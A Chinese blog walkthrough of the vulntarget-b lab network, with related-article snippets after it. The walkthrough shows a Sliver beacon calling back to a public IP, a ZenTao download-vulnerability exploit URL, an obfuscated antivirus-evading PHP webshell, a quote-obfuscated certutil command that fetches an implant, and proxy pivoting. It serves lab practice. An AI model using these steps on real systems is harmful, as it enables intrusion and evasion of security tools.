vulntarget-b记录(Sliver学习)

网络环境

域控(Win2016)

vulntarget\administrator:Admin@123、(首次登陆要改密码修改为Admin@123@)

vulntarget\win101:admin#123

边界Web主机突破

nmap扫描发现81端口

通过扫描,fuzz出来了后台地址

具体的WEB突破手段参考一下师傅的文章:

vulntarget-b靶场详细通关记录_vulntarget -b-CSDN博客

使用sliver,生产一个马子

[server] sliver > generate  beacon --mtls 106.54.61.66:3308 --os linux[*] Generating new linux/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 50s
[*] Implant saved to /home/ubuntu/SURVIVING_ILLEGAL[server] sliver >

通过蚁剑去运行马子上线,

[server] sliver > mtls -l 3308  #监听端口[*] Starting mTLS listener ...[*] Successfully started job #2[*] Beacon 0d8be3d0 SURVIVING_ILLEGAL - 192.168.1.104:9442 (localhost.localdomain) - linux/amd64 - Mon, 03 Jun 2024 14:31:26 CST[server] sliver >

发现双网卡

通过传上去一个fscan,扫描结果如下

发现

[+] InfoScan http://10.0.20.66:8080    [禅道] 
这里尝试了 re ,毒刺,ew 都不太行(应该是我操作姿势不对)后来发现通过iox代理工具可以获取到一个稳定的流量转发隧道。

工具链接 : GitHub - EddieIvan01/iox: Tool for port forwarding & intranet proxy

/.iox proxy -l 1080

配置浏览器代理 下图的192.168.1.104 是边界靶机IP,上边的命令也是在边界靶机中运行

成功访问到:http://10.0.20.66:8080  

通过测试发现 同样存在弱口令 admin Admin123

信息收集发现存在CNVD-C-2020-121325漏洞

可用poc:

http:// [目标地址] /www/index.php?m=client&f=download&version=[$version参数]&link=[ base64加密后的恶意文件地址]HTTP://10.0.20.30:8000/1.php  #因为发现边界服务器存在python2 所以我直接将webshell传入到边界服务器,利用python2开启web服务最终payload:
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODAwMC8xLnBocA==

这里需要注意,因为 10.0.20.66 上存在火绒,一句话木马啥的会被直接杀,所以需要构造一个免杀的webshll,我这里使用的webshell如下:

<?php$Xfp_3 = create_function('', $_REQUEST["\141"]); $Xfp_3();//密码a

蚁剑挂一个代理:

这里继续使用sliver

socks5 start #开启代理
pivots tcp --bind 10.0.20.30     
pivots
generate --tcp-pivot 10.0.20.30:9898 --os win

把这个马子传入web服务靶机上,开启http服务,使用刚才植入的webshell利用蚁剑下载这个马子

这里直接下载会被火绒拦截

绕过一下,姿势如下:

certutil  -""u""r""l""c""a""c""h""e"" -split -f http://10.0.20.30:8000/RUDE_DIVER.exe www.exe

拿到主机权限

 发现 10.0.10.99/24 网段,而且发现处于域环境。

得到域控IP 10.0.10.100

继续上iox挂二层代理

centos

centos(web服务边界主机):./iox proxy -l 2258 -l 1080
win10(内网域主机)      : iox.exe proxy -r 10.0.20.30:2258随后在代理共添加
192.168.1.104 1080

代理没问题。

之后....................域控没打下来

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/22493.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Python学习】面向对象(OOP)

【Python学习】面向对象(OOP)

让我们从Python面向对象编程&#xff08;OOP&#xff09;的基础概念开始&#xff0c;逐步深入到继承、多态、特殊方法和运算符重载。 一、类和对象 什么是类和对象&#xff1f; - 类&#xff08;Class&#xff09;&#xff1a;类是创建对象的蓝图或模板。它定义了一组属性和方法…
阅读更多...
c语言如何改变文件读取位置

c语言如何改变文件读取位置

c语言要改变文件读取位置&#xff0c;会用到rewind语句和fseek语句 rewind语法格式是 rewind(fp)将fp指向的文件读写指针重新指向文件开头 rewind代码示例如下 #include<stdio.h> int main() {FILE *fp1,*fp2;char buf[10];int a;fp1fopen("aaa.txt","…
阅读更多...
DJI FlyCart 30 天空 “吊车”概念板评测!

DJI FlyCart 30 天空 “吊车”概念板评测!

从消费级无人机&#xff0c;到专业级无人机&#xff0c;再到行业级无人机&#xff0c;大疆的探索脚步从未停下。现在&#xff0c;大疆已经正式进入民用运载无人机行列&#xff01;就在8月16日&#xff0c;大疆正式发布首款民用运载无人机 —— DJI FlyCart 30。 作为大疆第一代…
阅读更多...
【面试题-002】Java 中,`==` 和 `equals()`区别

【面试题-002】Java 中,`==` 和 `equals()`区别

在 Java 中&#xff0c; 和 equals() 是两种常用的比较操作&#xff0c;但它们用于不同的目的&#xff1a; 操作符&#xff1a; 用于比较两个对象的引用是否相同&#xff0c;即它们是否指向内存中的同一个对象。对于基本数据类型&#xff08;如 int、float、char 等&#xff0…
阅读更多...
1130. 【二维数组】打印螺旋矩阵

1130. 【二维数组】打印螺旋矩阵

题目描述 打印n行的以下图形&#xff0c;n由键盘输入&#xff0c;例如n5时&#xff1a; 1 2 3 4 5 16 17 18 19 6 15 24 25 20 7 14 23 22 21 8 13 12 11 10 9 输入 输入n&#xff0c;表示n行 输出 输出符合规律的n行矩阵 样例输入 复制 5 样例输…
阅读更多...
android使用通知和快捷方式

android使用通知和快捷方式

1.权限 android 13版本 将通知改为运行时权限&#xff0c;需要向用户动态申请权限。 // 权限请求implementation com.guolindev.permissionx:permissionx:1.7.1 2.通知工具类 通知了解&#xff1a;官网 import android.app.NotificationChannel import android.app.Notifi…
阅读更多...
Flutter基础 -- Flutter基础特性

Flutter基础 -- Flutter基础特性

目录 1. 一切都是 widget 1.1 UI 组件&#xff01;&#xff01;&#xff01; 1.2 架构设计 1.3 sdk 源码目录 1.4 widget 分类&#xff01;&#xff01;&#xff01; 参考文献 2. devTools 调试工具 2.1 启动调试器 2.2 布局面板 参考文献 3. 布局约束规则 3.1 让子…
阅读更多...
亲,你有多久没有清理过你电脑的 DNS 缓存了?

亲,你有多久没有清理过你电脑的 DNS 缓存了?

最近明月因为工作关系更换了几次使用的电脑,期间就发现明明另一台电脑访问某个网址是正常,换一台电脑后就会出现无法访问的现象,并且用的还是同一个宽带网络,实在是太诡异了!后来还是突然想起来 DNS 缓存这个问题,立马清除了那台电脑的 DNS 缓存后,打不开的网址顺利的呈…
阅读更多...
银河麒麟V10 sp1使用pyautogui进行屏幕截图报错

银河麒麟V10 sp1使用pyautogui进行屏幕截图报错

** Message: 13:47:21.044: Unable to use GNOME Shells builtin screenshot interface, resorting to fallback X11. screenshot pyautogui.screenshot() screenshot.save(file_name) 使用以上代码在Ubuntu22.04操作系统上进行截屏没有任何问题&#xff08;桌面环境GNOME&am…
阅读更多...
FPGA PCIe PIO代码的学习

FPGA PCIe PIO代码的学习

目录 背景 应用场景 代码架构分析 结论 背景 本项目是基于xinlinx官方的PCIe IP 7 series integrated block for PCI Express。根据官方的例程加上官方给的example&#xff0c;对代码进行分析。 应用场景 对一些速率要求不高的&#xff0c;比如IO操作&#xff0c;推荐使用…
阅读更多...
对新手友好的最简单方便的本地项目关联git远程仓库教程

对新手友好的最简单方便的本地项目关联git远程仓库教程

对新手友好的最简单方便的本地项目关联git远程仓库教程 前置条件1.本地项目2.gitee上创建同名项目 关联操作1.在本地进行clone远程仓库操作2.把本地项目下的目录和文件都复制到这个克隆自git的项目文件夹里面3.查看文件状态和提交文件 在我们创建项目时&#xff0c;一般都是在本…
阅读更多...
ubuntu编译打包的时候不想要linux-image-unsigned-xxxx.deb

ubuntu编译打包的时候不想要linux-image-unsigned-xxxx.deb

ubuntu内核源码编译的时候呢打包总是打成 linux-image-unsigned-xxxx.deb 不想要linux-image-unsigned-xxxx.deb 想要linux-image-xxxx.deb 修改 control-create #!/bin/bash. debian/debian.envvars=$1 any_signed=$2. $vars[ "$provides" != ] && pro…
阅读更多...
QAnything-1.4.01.4.1版本更新!使用指北!

QAnything-1.4.01.4.1版本更新!使用指北!

久等了各位&#xff01;时隔一个多月&#xff0c;我们在4月26日和5月20日接连发布了v1.4.0和v1.4.1两个版本&#xff0c;带来了问答性能&#xff0c;解析效果等多方面的改进&#xff0c;并新增了大量的新功能和新特性 详见&#xff1a;releases 以及 使用说明 最新特性表 开发…
阅读更多...
13-至少有5名直接下属的经理(高频 SQL 50 题基础版)

13-至少有5名直接下属的经理(高频 SQL 50 题基础版)

13-至少有5名直接下属的经理 select name from Employee where id in (select managerId -- 查找大于5的经理idfrom Employeegroup by managerId -- 根据id分组having count(*)>5); -- 根据分组的数据进行求个数
阅读更多...
java连接MySQL数据库

java连接MySQL数据库

环境准备 JDK安装 Navicat MySQL安装 下载jar包 MySQL :: Download MySQL Connector/J (Archived Versions) 创建数据库 1. 打开Navicat 2. 新建数据库 3. 定义数据库名 4. 新建查询 运行如下代码创建表log CREATE TABLE log (user VARCHAR(255) NOT NULL UNIQUE,pwd …
阅读更多...
mysql8 .net sqlsuger 批量插入dbScope.Fastest<T>().PageSize(2000).BulkCopy(T)>

mysql8 .net sqlsuger 批量插入dbScope.Fastest<T>().PageSize(2000).BulkCopy(T)>

连接mysql时出现 MySqlConnector.MySqlException (0x80004005): Access denied; you need (at least one of) the SUPER or SYSTEM_VARIABLES_ADMIN privilege(s) for this operation 需要再数据库开启权限 grant SUPER,SYSTEM_VARIABLES_ADMIN on *.* to rootUser;flush pri…
阅读更多...
Python数据框操作 -- 提取数据

Python数据框操作 -- 提取数据

创建一个数据框 import pandas as pd df pd.DataFrame({a:[2,2,3,4,5], b:[6,7,8,8,9]}) #创建一个数据框 提取某列 df.a # df的a这一列 df[a] # df的a这一列 df.iloc[:,0] # df的所有行&#xff0c;第0列&#xff08;依然是a列&#xff09; 提取某几列 df[[a,b]] #…
阅读更多...
未见过类型题每周总结(个人向)

未见过类型题每周总结(个人向)

1.DP40 小红取数 题目 解析 一道01背包的衍生问题&#xff0c;我们可以按照它的思路定义数组dp[i][j],表示前i个数中%k为j的最大和。为什么设置未%k的最大和呢&#xff1f;是因为当两个数分别%k&#xff0c;如a%kx&#xff0c;b%ky。那么&#xff08;ab&#xff09;%k&#…
阅读更多...
C++基础与深度解析 | 类进阶 | 运算符重载 | 类的继承 | 虚函数

C++基础与深度解析 | 类进阶 | 运算符重载 | 类的继承 | 虚函数

文章目录 一、运算符重载二、类的继承1.类的继承2.虚函数 一、运算符重载 在C中&#xff0c;operator关键字用于重载运算符&#xff0c;使得类的实例可以使用内置的操作符&#xff08;如、-、*、/等&#xff09;进行操作。 运算符重载的特性&#xff1a; 重载不能发明新的运算…
阅读更多...
通信协议:常见的芯片间通信协议

通信协议:常见的芯片间通信协议

相关阅读 通信协议https://blog.csdn.net/weixin_45791458/category_12452508.html?spm1001.2014.3001.5482 本文将简单介绍一些常见的芯片间通信协议&#xff0c;但不会涉及到协议的具体细节。首先说明&#xff0c;芯片间通信方式根据通信时钟的区别可以分为&#xff1a;异步…
阅读更多...
最新文章

Copyright @ 2022~2023